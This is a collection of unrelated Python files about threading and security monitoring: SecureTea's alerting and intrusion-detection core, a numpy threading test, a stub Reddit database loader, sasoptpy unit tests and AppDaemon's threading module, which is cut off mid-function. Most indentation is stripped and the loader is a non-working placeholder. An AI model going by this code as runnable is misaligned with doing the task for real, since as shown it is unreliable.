self.iot_mode_obj = iot_mode.IoTMode(cred=self.cred, debug=self.cred["debug"])
self.iot_mode_obj.start_iot_mode()
            # The IoT mode already starts these components, so disable their *_provided flags to avoid duplicate processes
self.firewall_provided = False
self.ids_provided = False
self.iot_checker_provided = False
if self.twitter_provided:
self.twitter = secureTeaTwitter.SecureTeaTwitter(
self.cred['twitter'],
self.cred['debug']
)
if not self.twitter.enabled:
self.logger.log(
"Twitter notification not configured properly.",
logtype="error"
)
else:
self.twitter.notify("Welcome to SecureTea..!! Initializing System")
if self.telegram_provided:
self.telegram = SecureTeaTelegram(
self.cred['telegram'],
self.cred['debug']
)
if not self.telegram.enabled:
self.logger.log(
"Telegram notification not configured properly.",
logtype="error"
)
else:
self.telegram.notify("Welcome to SecureTea..!! Initializing System")
if self.twilio_provided:
self.twilio = secureTeaTwilio.SecureTeaTwilio(
self.cred['twilio'],
self.cred['debug']
)
if not self.twilio.enabled:
self.logger.log(
"Twilio not configured properly.",
logtype="error"
)
else:
self.twilio.notify("Welcome to SecureTea..!! Initializing System")
if self.slack_provided:
self.slack = secureTeaSlack.SecureTeaSlack(
self.cred['slack'],
self.cred['debug']
)
if not self.slack.enabled:
self.logger.log(
"Slack not configured properly.",
logtype="error"
)
else:
self.slack.notify("Welcome to SecureTea..!! Initializing System")
if self.aws_ses_provided:
self.aws_ses = secureTeaAwsSES.SecureTeaAwsSES(
self.cred['aws_ses'],
self.cred['debug']
)
if not self.aws_ses.enabled:
self.logger.log(
"AWS SES not configured properly.",
logtype="error"
)
else:
self.aws_ses.notify("Welcome to SecureTea..!! Initializing System")
if self.gmail_provided:
self.gmail_obj = secureTeaGmail.SecureTeaGmail(
cred=self.cred['gmail'],
debug=self.cred['debug']
)
if not self.gmail_obj.enabled:
self.logger.log(
"Gmail not configured properly.",
logtype="error"
)
else:
self.gmail_obj.notify("Welcome to SecureTea..!! Initializing System")
if self.firewall_provided:
try:
if self.cred['firewall']:
firewallObj = secureTeaFirewall.SecureTeaFirewall(cred=self.cred,
debug=self.cred['debug'])
firewallObj.start_firewall()
except KeyError:
self.logger.log(
"Firewall configuration parameter not configured.",
logtype="error"
)
if self.insecure_headers_provided:
try:
if self.cred['insecure_headers']:
url = self.cred['insecure_headers']['url']
insecure_headers_obj = secureTeaHeaders.SecureTeaHeaders(url=url,
debug=self.cred['debug'])
insecure_headers_obj.analyze()
except KeyError:
self.logger.log(
"Insecure headers parameter not configured.",
logtype="error"
)
if self.ids_provided:
try:
if self.cred['ids']:
ids_obj = secureTeaIDS.SecureTeaIDS(cred=self.cred['ids'],
debug=self.cred['debug'])
ids_obj.start_ids()
except KeyError:
self.logger.log(
"Intrusion Detection System (IDS) parameter not configured.",
logtype="error"
)
if self.system_log_provided:
try:
sys_obj = engine.SystemLogEngine(debug=self.cred['debug'])
sys_obj.run()
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.server_log_provided:
server_cred = self.cred['server_log']
try:
server_obj = SecureTeaServerLog(debug=self.cred['debug'],
log_type=server_cred['log-type'],
log_file=server_cred['log-file'],
window=server_cred['window'],
ip_list=server_cred['ip-list'],
status_code=server_cred['status-code'])
server_obj.run()
except KeyError:
self.logger.log(
"Server Log parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.auto_server_patcher_provided:
auto_server_patcher_cred = self.cred['auto_server_patcher']
try:
patcher_obj = SecureTeaAutoServerPatcher(debug=self.cred['debug'],
cred=auto_server_patcher_cred)
patcher_obj.start()
except KeyError:
self.logger.log(
"Auto Server Patcher parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.web_deface_provided:
web_deface = self.cred['web_deface']
try:
web_deface_obj = WebDeface(debug=self.cred['debug'],
path=web_deface['path'],
server_name=web_deface['server-name'])
web_deface_obj.start()
except KeyError:
self.logger.log(
"Web Deface Detection parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.antivirus_provided:
antivirus = self.cred['antivirus']
try:
antivirus_obj = SecureTeaAntiVirus(debug=self.cred['debug'], cred=antivirus)
antivirus_obj.start()
except KeyError:
self.logger.log(
"AntiVirus parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.iot_checker_provided:
try:
iot_checker_obj = iot_checker.IoTChecker(debug=self.cred['debug'],
api_key=self.cred['iot-check']['shodan-api-key'],
ip=self.cred['iot-check']['ip'])
iot_checker_obj.check_shodan_range()
except KeyError:
self.logger.log(
"IoT checker parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
def send_notif(self, msg):
"""Send notification through
the available mediums.
Args:
msg (str): Message to send
Raises:
None
Returns:
None
"""
# Send a warning message via twitter account
if self.twitter_provided:
self.twitter.notify(msg)
# Send a warning message via telegram bot
if self.telegram_provided:
self.telegram.notify(msg)
# Send a warning message via twilio account
if self.twilio_provided:
self.twilio.notify(msg)
# Send a warning message via slack bot app
if self.slack_provided:
self.slack.notify(msg)
# Send a warning message via aws ses bot3 app
if self.aws_ses_provided:
self.aws_ses.notify(msg)
# Send a warning message via Gmail
if self.gmail_provided:
self.gmail_obj.notify(msg)
def on_move(self, x, y):
"""
Log warning on terminal & send notification
on mouse movement.
Args:
x (TYPE): X - mouse position
y (TYPE): y - mouse position
Raises:
None
Returns:
bool (False): Stop the listener
"""
self.logger.log('Pointer moved to {0}'.format((x, y)))
msg = '(' + str(self.alert_count) + \
') : Someone has accessed your computer'
# Shows the warning msg on the console
self.logger.log(msg, logtype="warning")
# Send message notification to available platforms
self.send_notif(msg)
# Update counter for the next move
self.alert_count += 1
self.logger.log("The program will sleep for 10 seconds")
time.sleep(10)
# Ready to monitor the next move
self.logger.log("Ready to monitor further movement .. !!")
# Stop the listener
return False
@staticmethod
def get_mouse_event():
"""Get mouse event.
Args:
None
Raises:
None
Returns:
x (int): X - mouse position
y (int): y - mouse position
"""
with open("/dev/input/mice", "rb") as fh:
buf = fh.read(3)
x, y = struct.unpack("bb", buf[1:])
return x, y
def get_by_mice(self):
"""Detect intrusion by watching mouse coordinates.
Args:
None
Raises:
None
Returns:
None
"""
posx = 0
posy = 0
while(1):
x, y = self.get_mouse_event()
posx = posx + x
posy = posy + y
if (posx > 100 or posy > 100 or posx < -100 or posy < -100):
posx = 0
posy = 0
self.on_move(posx, posy)
def on_user_update(self):
"""
Send updates regarding the users currently logged in to the system
to various platforms.
"""
msg = self.userLogger.log()
if msg == "USERS UPDATES\n":
self.logger.log("NO NEW USERS DETECTED")
return
# Shows the warning msg on the console
self.logger.log(msg, logtype="warning")
# Send message notification to available platforms
self.send_notif(msg)
return
def run_mouse_notifs(self):
"""Run methods for notification using mice activity"""
time.sleep(10)
try:
if not pynput_status:
self.get_by_mice()
else:
while 1:
                    # Starting mouse event listener
with mouse.Listener(on_move=self.on_move) as listener:
listener.join()
except Exception as e:
self.logger.log(
"Something went wrong: " + str(e) + " End of program",
logtype="error"
)
except KeyboardInterrupt as e:
self.logger.log(
"You pressed Ctrl+C!, Bye")
exit()
def run_user_notifs(self):
"""Run methods for notification of users added or removed"""
try:
from securetea import users
self.userLogger = users.SecureTeaUserLogger(self.cred['debug'])
if not pynput_status:
self.get_by_mice()
else:
while 1:
# Starting user notifs
self.on_user_update()
time.sleep(10)
except Exception as e:
self.logger.log(
"Something went wrong: " + str(e) + " End of program",
logtype="error"
)
except KeyboardInterrupt as e:
self.logger.log(
"You pressed Ctrl+C!, Bye")
exit()
def run(self):
"""
Track mouse activity & SSH users on
different threads.
Args:
None
Raises:
None
Returns:
None
"""
try:
t1 = threading.Thread(target=self.run_mouse_notifs)
t2 = threading.Thread(target=self.run_user_notifs)
t2.start()
t1.start()
except Exception as e:
self.logger.log(
"Something went wrong: " + str(e) + " End of program",
logtype="error"
)
except KeyboardInterrupt as e:
self.logger.log(
"You pressed Ctrl+C!, Bye")
exit()
|
multit.py
|
import time, threading
import numpy as np
# Assume this is your bank balance:
start = time.time()
x = 128
balance = np.zeros([x,x,x])
def change_it(i,j,k):
    # Deposit first, then withdraw; the result should be 0:
global balance
balance[i,j,k] = i*25+j*5+k
# balance = balance - n
def run_thread(n):
for i in range(n):
for j in range(n):
for k in range(n):
print(i,j,k)
change_it(i,j,k)
#t1 = threading.Thread(target=run_thread, args=(x,))
#t1.start()
#t1.join()
run_thread(x)
print(balance)
end = time.time()
print(end-start)
#from multiprocessing import Pool
#import os, time, random
#
#
#
#def long_time_task(i,j,k):
# return i*25+j*5+k
#
#if __name__=='__main__':
# print('Parent process %s.' % os.getpid())
## index = []
# xx = []
# p = Pool(4)
# for i in range(5):
# for j in range(5):
# for k in range(5):
# r = p.apply_async(long_time_task, args=(i,j,k))
# xx.append([i,j,k,r])
## index.append(i)
#
# print('Waiting for all subprocesses done...')
## p.close()
## p.join(1)
#
# print('All subprocesses done.')
# flux = np.zeros([5,5,5])
#
## a = np.asarray(xx)
## flux[a[:,0],a[:,1],a[:,2]] = a[:,3]
# for n in xx:
# flux[n[0],n[1],n[2]] = n[3].get()
|
PopulateRedditDB.py
|
from multiprocessing import Process, Manager
import time
import itertools
import sys, getopt, json, csv
import psycopg2
class Config:
def __init__(self, corpus, dbhost, dbname, dbuser, dbpassword, threads, subredditid):
self.corpus = corpus
self.dbhost = dbhost
self.dbname = dbname
self.dbuser = dbuser
self.dbpassword = dbpassword
self.threads = threads
self.subredditid = subredditid
def __str__(self):
        return self.corpus + ',' + self.dbhost + ',' + self.dbname + ',' + self.dbuser + ',' + self.dbpassword + ',' + str(self.threads) + ',' + self.subredditid
def connprep(self):
return 'dbname=' + self.dbname + ' user=' + self.dbuser + ' host=' + self.dbhost + ' password=' + self.dbpassword
class Post:
def __init__(self,post):
#do work
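        # Placeholder: a real implementation would parse `post` (one corpus line) and
        # expose at least a `subredditid` attribute, which insert() checks below.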
return
def __str__(self):
return "self"
def ReturnInsert(self):
return "INSERT into Posts ()"
def insert(config, work):
    # Worker process: consume corpus lines from the queue until a None sentinel arrives.
    conn = psycopg2.connect(config.connprep())
    cursor = conn.cursor()
    while True:
        line = work.get()
        if line is None:
            break
        p = Post(line)
        if p.subredditid == config.subredditid:
            cursor.execute(p.ReturnInsert())
            conn.commit()
    cursor.close()
    conn.close()
def LoadIntoDB(config):
    pool = []
    manager = Manager()
    work = manager.Queue(config.threads)
    for i in range(config.threads):
        p = Process(target=insert, args=(config, work))
        p.start()
        pool.append(p)
    with open(config.corpus) as f:
        # Append one None sentinel per worker so every process eventually stops.
        iters = itertools.chain(f, (None,) * config.threads)
        for line in iters:
            work.put(line)
    for p in pool:
        p.join()
def GetConfig(filename,threads,subredditid):
    config = list(open(filename))[0].strip().split(',')
    return Config(config[0], config[1], config[2], config[3], config[4], int(threads), subredditid)
if __name__ == '__main__':
threads = ''
subredditid = ''
config = ''
try:
opts, args = getopt.getopt(sys.argv[1:],"t:s:c:h")
except getopt.GetoptError:
print('PopulateDB.py -t <threads> -s <subredditid> -c <config>')
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print('PopulateDB.py -t <threads> -s <subredditid> -c <config>')
sys.exit()
elif opt in ("-t"):
threads = arg
elif opt in ("-s"):
subredditid = arg
elif opt in ("-c"):
config = arg
LoadIntoDB(GetConfig(config, threads,subredditid))
|
test_workspace.py
|
#!/usr/bin/env python
# encoding: utf-8
#
# Copyright SAS Institute
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Unit tests for workspaces.
"""
import os
import unittest
import warnings
from inspect import cleandoc
from swat import CAS, SWATError
import sasoptpy as so
from tests.swat_config import create_cas_connection
class TestWorkspace(unittest.TestCase):
"""
Unit tests for the :class:`sasoptpy.Workspace` objects
"""
@classmethod
def setUpClass(cls):
so.reset()
cls.conn = None
try:
cls.conn = create_cas_connection()
except SWATError:
warnings.warn('CAS connection is not available', RuntimeWarning)
except TypeError:
warnings.warn('CAS variables are not available', RuntimeWarning)
@classmethod
def tearDownClass(cls):
if cls.conn is not None:
cls.conn.close()
def setUp(self):
so.reset()
def test_vg_in_session(self):
with so.Workspace('w') as w:
x = so.VariableGroup(4, name='x')
x[2].set_bounds(lb=1)
x[3].set_init(5)
self.assertEqual(so.to_optmodel(w), cleandoc('''
proc optmodel;
var x {{0,1,2,3}};
x[3] = 5;
x[2].lb = 1;
quit;'''))
def test_attributes(self):
with so.Workspace('w') as w:
S = so.Set(name='S')
x = so.Variable(name='x')
y = so.VariableGroup(4, name='y')
z = so.VariableGroup(S, name='z')
d = so.Variable(name='d')
e = so.Variable(name='d')
t = so.VariableGroup(2, name='t')
u = so.VariableGroup(2, name='t')
self.assertIn('Workspace[ID', str(w))
self.assertEqual('sasoptpy.Workspace(w)', repr(w))
w.set_session(None)
self.assertEqual(w.get_session(), None)
self.assertIs(x, w.get_variable('x'))
self.assertIs(y, w.get_variable('y'))
self.assertIs(z[0], w.get_variable('z[0]'))
def warn_duplicate():
w.get_variable('d')
self.assertWarns(UserWarning, warn_duplicate)
def warn_duplicate_vg():
w.get_variable('t')
self.assertWarns(UserWarning, warn_duplicate_vg)
w.set_variable_value('z[0]', 1)
self.assertEqual(z[0].get_value(), 1)
self.assertEqual(w.get_variable('a'), None)
def test_var_values(self):
if TestWorkspace.conn is None:
self.skipTest('CAS session is not available')
from sasoptpy.actions import solve
with so.Workspace('test_var_vals', session=TestWorkspace.conn) as w:
S = so.Set(name='S', value=[1, 2, 3])
x = so.Variable(name='x', lb=1, ub=4)
y = so.VariableGroup(S, name='y', ub=7)
z = so.VariableGroup(2, name='z', ub=2)
o = so.Objective(x+y[1]+y[2]+y[3]+z[0], name='obj', sense=so.MAX)
solve()
w.submit(verbose=True)
self.assertEqual(so.to_optmodel(w), cleandoc('''
proc optmodel;
set S = {1,2,3};
var x >= 1 <= 4;
var y {{S}} <= 7;
var z {{0,1}} <= 2;
max obj = x + y[1] + y[2] + y[3] + z[0];
solve;
quit;'''))
self.assertEqual(x.get_value(), 4)
self.assertEqual(y[1].get_value(), 7)
self.assertEqual(z[0].get_value(), 2)
def test_ws_parsing(self):
if TestWorkspace.conn is None:
self.skipTest('CAS session is not available')
from sasoptpy.actions import solve, drop, print_item
from math import inf
with so.Workspace('test_ws_parsing', session=TestWorkspace.conn)\
as w:
x = so.Variable(name='x')
y = so.Variable(name='y', vartype=so.INT, lb=-inf)
o = so.Objective(x**2-4*x+4, sense=so.MIN, name='obj')
c1 = so.Constraint(x <= 1, name='c1')
c2 = so.Constraint(x == 3*y, name='c2')
s1 = solve(options={'with': so.BLACKBOX})
p1 = print_item(x)
drop(c1)
s2 = so.LiteralStatement('solve with blackbox;')
p2 = so.LiteralStatement('print y;')
self.assertEqual(so.to_optmodel(w), cleandoc('''
proc optmodel;
var x;
var y integer;
min obj = (x) ^ (2) - 4 * x + 4;
con c1 : x <= 1;
con c2 : x - 3 * y = 0;
solve with blackbox;
print x;
drop c1;
solve with blackbox;
print y;
quit;'''))
w.submit()
self.assertEqual(x.get_value(), 3)
print(s1.get_problem_summary().to_string())
self.assertEqual(s1.get_problem_summary().to_string(), cleandoc('''
Problem Summary
Value
Label
Objective Sense Minimization
Objective Function obj
Objective Type Quadratic
Number of Variables 2
Bounded Above 0
Bounded Below 0
Bounded Below and Above 0
Free 2
Fixed 0
Binary 0
Integer 1
Number of Constraints 2
Linear LE (<=) 1
Linear EQ (=) 1
Linear GE (>=) 0
Linear Range 0
Constraint Coefficients 3'''))
self.assertEqual(p1.get_response().to_string(), cleandoc('''
x
x
0 0.0'''))
self.assertEqual(p2.get_response().to_string(), cleandoc('''
y
y
0 1.0'''))
def test_multithread_workspace(self):
import time
from threading import Thread
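        # Each thread opens its own Workspace and asserts that so.container points to it,
        # i.e. the active container is expected to be tracked per thread.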
def create_workspace(i):
with so.Workspace(f'w{i}') as w:
self.assertEqual(so.container, w)
print('Start workspace: {}'.format(w.name))
time.sleep(1)
print('Exit workspace: {}'.format(w.name))
return i
threads = []
for j in [1, 2, 3]:
t = Thread(target=create_workspace, args=(j,))
threads.append(t)
t.start()
for thread in threads:
thread.join()
print(threads)
|
threading.py
|
import asyncio
import threading
import datetime
from queue import Queue
from random import randint
import re
import sys
import traceback
import inspect
from datetime import timedelta
import logging
import functools
import iso8601
from appdaemon import utils as utils
from appdaemon.appdaemon import AppDaemon
class Threading:
def __init__(self, ad: AppDaemon, kwargs):
self.AD = ad
self.kwargs = kwargs
self.logger = ad.logging.get_child("_threading")
self.diag = ad.logging.get_diag()
self.thread_count = 0
self.threads = {}
# A few shortcuts
self.add_entity = ad.state.add_entity
self.get_state = ad.state.get_state
self.set_state = ad.state.set_state
self.add_to_state = ad.state.add_to_state
self.add_to_attr = ad.state.add_to_attr
self.auto_pin = True
self.pin_threads = 0
self.total_threads = 0
# Setup stats
self.current_callbacks_executed = 0
self.current_callbacks_fired = 0
self.last_stats_time = datetime.datetime(1970, 1, 1, 0, 0, 0, 0)
self.callback_list = []
async def get_q_update(self):
for thread in self.threads:
qsize = self.get_q(thread).qsize()
await self.set_state("_threading", "admin", "thread.{}".format(thread), q=qsize)
async def get_callback_update(self):
now = datetime.datetime.now()
self.callback_list.append(
{
"fired": self.current_callbacks_fired,
"executed": self.current_callbacks_executed,
"ts": now
})
if len(self.callback_list) > 10:
self.callback_list.pop(0)
fired_sum = 0
executed_sum = 0
for item in self.callback_list:
fired_sum += item["fired"]
executed_sum += item["executed"]
total_duration = (self.callback_list[len(self.callback_list) -1]["ts"] - self.callback_list[0]["ts"]).total_seconds()
if total_duration == 0:
fired_avg = 0
executed_avg = 0
else:
fired_avg = round(fired_sum / total_duration, 1)
executed_avg = round(executed_sum / total_duration, 1)
await self.set_state("_threading", "admin", "sensor.callbacks_average_fired", state=fired_avg)
await self.set_state("_threading", "admin", "sensor.callbacks_average_executed", state=executed_avg)
self.last_stats_time = now
self.current_callbacks_executed = 0
self.current_callbacks_fired = 0
async def init_admin_stats(self):
# Initialize admin stats
await self.add_entity("admin", "sensor.callbacks_total_fired", 0)
await self.add_entity("admin", "sensor.callbacks_average_fired", 0)
await self.add_entity("admin", "sensor.callbacks_total_executed", 0)
await self.add_entity("admin", "sensor.callbacks_average_executed", 0)
await self.add_entity("admin", "sensor.threads_current_busy", 0)
await self.add_entity("admin", "sensor.threads_max_busy", 0)
await self.add_entity("admin", "sensor.threads_max_busy_time", utils.dt_to_str(datetime.datetime(1970, 1, 1, 0, 0, 0, 0)))
await self.add_entity("admin", "sensor.threads_last_action_time", utils.dt_to_str(datetime.datetime(1970, 1, 1, 0, 0, 0, 0)))
async def create_initial_threads(self):
kwargs = self.kwargs
if "threads" in kwargs:
self.logger.warning(
"Threads directive is deprecated apps - will be pinned. Use total_threads if you want to unpin your apps")
if "total_threads" in kwargs:
self.total_threads = kwargs["total_threads"]
self.auto_pin = False
else:
apps = await self.AD.app_management.check_config(True, False)
self.total_threads = int(apps["active"])
self.pin_apps = True
utils.process_arg(self, "pin_apps", kwargs)
if self.pin_apps is True:
self.pin_threads = self.total_threads
else:
self.auto_pin = False
self.pin_threads = 0
if "total_threads" not in kwargs:
self.total_threads = 10
utils.process_arg(self, "pin_threads", kwargs, int=True)
if self.pin_threads > self.total_threads:
raise ValueError("pin_threads cannot be > total_threads")
if self.pin_threads < 0:
raise ValueError("pin_threads cannot be < 0")
self.logger.info("Starting Apps with %s workers and %s pins", self.total_threads, self.pin_threads)
self.next_thread = self.pin_threads
self.thread_count = 0
for i in range(self.total_threads):
await self.add_thread(True)
# Add thread object to track async
await self.add_entity("admin", "thread.async", "idle",
{
"q": 0,
"is_alive": True,
"time_called": utils.dt_to_str(datetime.datetime(1970, 1, 1, 0, 0, 0, 0)),
"pinned_apps": []
}
)
def get_q(self, thread_id):
return self.threads[thread_id]["queue"]
@staticmethod
def atoi(text):
return int(text) if text.isdigit() else text
def natural_keys(self, text):
        return [self.atoi(c) for c in re.split(r'(\d+)', text)]
# Diagnostics
def total_q_size(self):
qsize = 0
for thread in self.threads:
qsize += self.threads[thread]["queue"].qsize()
return qsize
def min_q_id(self):
id = 0
i = 0
qsize = sys.maxsize
for thread in self.threads:
if self.threads[thread]["queue"].qsize() < qsize:
qsize = self.threads[thread]["queue"].qsize()
id = i
i += 1
return id
async def get_thread_info(self):
info = {}
info["max_busy_time"] = await self.get_state("_threading", "admin", "sensor.threads_max_busy_time")
info["last_action_time"] = await self.get_state("_threading", "admin", "sensor.threads_last_action_time")
info["current_busy"] = await self.get_state("_threading", "admin", "sensor.threads_current_busy")
info["max_busy"] = await self.get_state("_threading", "admin", "sensor.threads_max_busy")
info["threads"] = {}
for thread in sorted(self.threads, key=self.natural_keys):
if thread not in info["threads"]:
info["threads"][thread] = {}
t = await self.get_state("_threading", "admin", "thread.{}".format(thread), attribute="all")
info["threads"][thread]["time_called"] = t["attributes"]["time_called"]
info["threads"][thread]["callback"] = t["state"]
info["threads"][thread]["is_alive"] = t["attributes"]["is_alive"]
return info
async def dump_threads(self):
self.diag.info("--------------------------------------------------")
self.diag.info("Threads")
self.diag.info("--------------------------------------------------")
current_busy = await self.get_state("_threading", "admin", "sensor.threads_current_busy")
max_busy = await self.get_state("_threading", "admin", "sensor.threads_max_busy")
max_busy_time = utils.str_to_dt(await self.get_state("_threading", "admin", "sensor.threads_max_busy_time"))
last_action_time = await self.get_state("_threading", "admin", "sensor.threads_last_action_time")
self.diag.info("Currently busy threads: %s", current_busy)
self.diag.info("Most used threads: %s at %s", max_busy, max_busy_time)
self.diag.info("Last activity: %s", last_action_time)
self.diag.info("Total Q Entries: %s", self.total_q_size())
self.diag.info("--------------------------------------------------")
for thread in sorted(self.threads, key=self.natural_keys):
t = await self.get_state("_threading", "admin", "thread.{}".format(thread), attribute="all")
print("thread.{}".format(thread), t)
self.diag.info(
"%s - qsize: %s | current callback: %s | since %s, | alive: %s, | pinned apps: %s",
thread,
t["attributes"]["q"],
t["state"],
t["attributes"]["time_called"],
t["attributes"]["is_alive"],
await self.get_pinned_apps(thread)
)
self.diag.info("--------------------------------------------------")
#
# Thread Management
#
def select_q(self, args):
#
# Select Q based on distribution method:
# Round Robin
# Random
# Load distribution
#
# Check for pinned app and if so figure correct thread for app
if args["pin_app"] is True:
thread = args["pin_thread"]
# Handle the case where an App is unpinned but selects a pinned callback without specifying a thread
# If this happens a lot, thread 0 might get congested but the alternatives are worse!
if thread == -1:
self.logger.warning("Invalid thread ID for pinned thread in app: %s - assigning to thread 0", args["name"])
thread = 0
else:
if self.thread_count == self.pin_threads:
raise ValueError("pin_threads must be set lower than threads if unpinned_apps are in use")
if self.AD.load_distribution == "load":
thread = self.min_q_id()
elif self.AD.load_distribution == "random":
thread = randint(self.pin_threads, self.thread_count - 1)
else:
# Round Robin is the catch all
thread = self.next_thread
self.next_thread += 1
if self.next_thread == self.thread_count:
self.next_thread = self.pin_threads
if thread < 0 or thread >= self.thread_count:
raise ValueError("invalid thread id: {} in app {}".format(thread, args["name"]))
id = "thread-{}".format(thread)
q = self.threads[id]["queue"]
q.put_nowait(args)
async def check_overdue_and_dead_threads(self):
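        # Restart worker threads that have died, and (in realtime mode) warn when a callback
        # has been running longer than the configured duration threshold.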
if self.AD.sched.realtime is True and self.AD.thread_duration_warning_threshold != 0:
for thread_id in self.threads:
if self.threads[thread_id]["thread"].is_alive() is not True:
self.logger.critical("Thread %s has died", thread_id)
self.logger.critical("Pinned apps were: %s", await self.get_pinned_apps(thread_id))
self.logger.critical("Thread will be restarted")
id=thread_id.split("-")[1]
await self.add_thread(silent=False, pinthread=False, id=id)
if await self.get_state("_threading", "admin", "thread.{}".format(thread_id)) != "idle":
start = utils.str_to_dt(await self.get_state("_threading", "admin", "thread.{}".format(thread_id), attribute="time_called"))
dur = (await self.AD.sched.get_now() - start).total_seconds()
if dur >= self.AD.thread_duration_warning_threshold and dur % self.AD.thread_duration_warning_threshold == 0:
self.logger.warning("Excessive time spent in callback: %s - %s",
await self.get_state("_threading", "admin", "thread.{}".format(thread_id), attribute="callback")
, dur)
async def check_q_size(self, warning_step, warning_iterations):
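        # Warn about possible thread starvation when the combined queue size across all worker
        # threads exceeds the configured threshold, throttling repeat warnings via
        # warning_step / warning_iterations.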
totalqsize = 0
for thread in self.threads:
totalqsize += self.threads[thread]["queue"].qsize()
if totalqsize > self.AD.qsize_warning_threshold:
if (warning_step == 0 and warning_iterations >= self.AD.qsize_warning_iterations) or warning_iterations == self.AD.qsize_warning_iterations:
for thread in self.threads:
qsize = self.threads[thread]["queue"].qsize()
if qsize > 0:
self.logger.warning("Queue size for thread %s is %s, callback is '%s' called at %s - possible thread starvation",
thread, qsize,
await self.get_state("_threading", "admin", "thread.{}".format(thread)),
iso8601.parse_date(await self.get_state("_threading", "admin", "thread.{}".format(thread), attribute="time_called"))
)
await self.dump_threads()
warning_step = 0
warning_step += 1
warning_iterations += 1
if warning_step >= self.AD.qsize_warning_step:
warning_step = 0
else:
warning_step = 0
warning_iterations = 0
return warning_step, warning_iterations
async def update_thread_info(self, thread_id, callback, app, type, uuid):
self.logger.debug("Update thread info: %s", thread_id)
if self.AD.log_thread_actions:
if callback == "idle":
self.diag.info(
"%s done", thread_id)
else:
self.diag.info(
"%s calling %s callback %s", thread_id, type, callback)
now = await self.AD.sched.get_now()
if callback == "idle":
start = utils.str_to_dt(await self.get_state("_threading", "admin", "thread.{}".format(thread_id), attribute="time_called"))
if self.AD.sched.realtime is True and (now - start).total_seconds() >= self.AD.thread_duration_warning_threshold:
self.logger.warning("callback %s has now completed", await self.get_state("_threading", "admin", "thread.{}".format(thread_id)))
await self.add_to_state("_threading", "admin", "sensor.threads_current_busy", -1)
await self.add_to_attr("_threading", "admin", "app.{}".format(app), "callbacks", 1)
await self.add_to_attr("_threading", "admin", "{}_callback.{}".format(type, uuid), "executed", 1)
await self.add_to_state("_threading", "admin", "sensor.callbacks_total_executed", 1)
self.current_callbacks_executed += 1
else:
await self.add_to_state("_threading", "admin", "sensor.threads_current_busy", 1)
self.current_callbacks_fired += 1
current_busy = await self.get_state("_threading", "admin", "sensor.threads_current_busy")
max_busy = await self.get_state("_threading", "admin", "sensor.threads_max_busy")
if current_busy > max_busy:
await self.set_state("_threading", "admin", "sensor.threads_max_busy" , state=current_busy)
await self.set_state("_threading", "admin", "sensor.threads_max_busy_time", state=utils.dt_to_str((await self.AD.sched.get_now()).replace(microsecond=0), self.AD.tz))
await self.set_state("_threading", "admin", "sensor.threads_last_action_time", state=utils.dt_to_str((await self.AD.sched.get_now()).replace(microsecond=0), self.AD.tz))
# Update thread info
if thread_id == "async":
await self.set_state("_threading", "admin", "thread.{}".format(thread_id),
q=0,
state=callback,
time_called=utils.dt_to_str(now.replace(microsecond=0), self.AD.tz),
is_alive=True,
pinned_apps=[]
)
else:
await self.set_state("_threading", "admin", "thread.{}".format(thread_id),
q=self.threads[thread_id]["queue"].qsize(),
state=callback,
time_called=utils.dt_to_str(now.replace(microsecond=0), self.AD.tz),
is_alive=self.threads[thread_id]["thread"].is_alive(),
pinned_apps=await self.get_pinned_apps(thread_id)
)
await self.set_state("_threading", "admin", "app.{}".format(app), state=callback)
#
# Pinning
#
async def add_thread(self, silent=False, pinthread=False, id=None):
if id is None:
tid = self.thread_count
else:
tid = id
if silent is False:
self.logger.info("Adding thread %s", tid)
t = threading.Thread(target=self.worker)
t.daemon = True
name = "thread-{}".format(tid)
t.setName(name)
if id is None:
await self.add_entity("admin", "thread.{}".format(name), "idle",
{
"q": 0,
"is_alive": True,
"time_called": utils.dt_to_str(datetime.datetime(1970, 1, 1, 0, 0, 0, 0)),
}
)
self.threads[name] = {}
self.threads[name]["queue"] = Queue(maxsize=0)
t.start()
self.thread_count += 1
if pinthread is True:
self.pin_threads += 1
else:
await self.set_state("_threading", "admin", "thread.{}".format(name), state="idle", is_alive=True)
self.threads[name]["thread"] = t
async def calculate_pin_threads(self):
if self.pin_threads == 0:
return
thread_pins = [0] * self.pin_threads
for name in self.AD.app_management.objects:
# Looking for apps that already have a thread pin value
if await self.get_app_pin(name) and await self.get_pin_thread(name) != -1:
thread = await self.get_pin_thread(name)
if thread >= self.thread_count:
raise ValueError("Pinned thread out of range - check apps.yaml for 'pin_thread' or app code for 'set_pin_thread()'")
# Ignore anything outside the pin range as it will have been set by the user
if thread < self.pin_threads:
thread_pins[thread] += 1
# Now we know the numbers, go fill in the gaps
for name in self.AD.app_management.objects:
if await self.get_app_pin(name) and await self.get_pin_thread(name) == -1:
thread = thread_pins.index(min(thread_pins))
await self.set_pin_thread(name, thread)
thread_pins[thread] += 1
for thread in self.threads:
pinned_apps = await self.get_pinned_apps(thread)
await self.set_state("_threading", "admin", "thread.{}".format(thread), pinned_apps=pinned_apps)
def app_should_be_pinned(self, name):
# Check apps.yaml first - allow override
app = self.AD.app_management.app_config[name]
if "pin_app" in app:
return app["pin_app"]
# if not, go with the global default
return self.pin_apps
async def get_app_pin(self, name):
return self.AD.app_management.objects[name]["pin_app"]
async def set_app_pin(self, name, pin):
self.AD.app_management.objects[name]["pin_app"] = pin
if pin is True:
# May need to set this app up with a pinned thread
await self.calculate_pin_threads()
async def get_pin_thread(self, name):
return self.AD.app_management.objects[name]["pin_thread"]
async def set_pin_thread(self, name, thread):
self.AD.app_management.objects[name]["pin_thread"] = thread
def validate_pin(self, name, kwargs):
valid = True
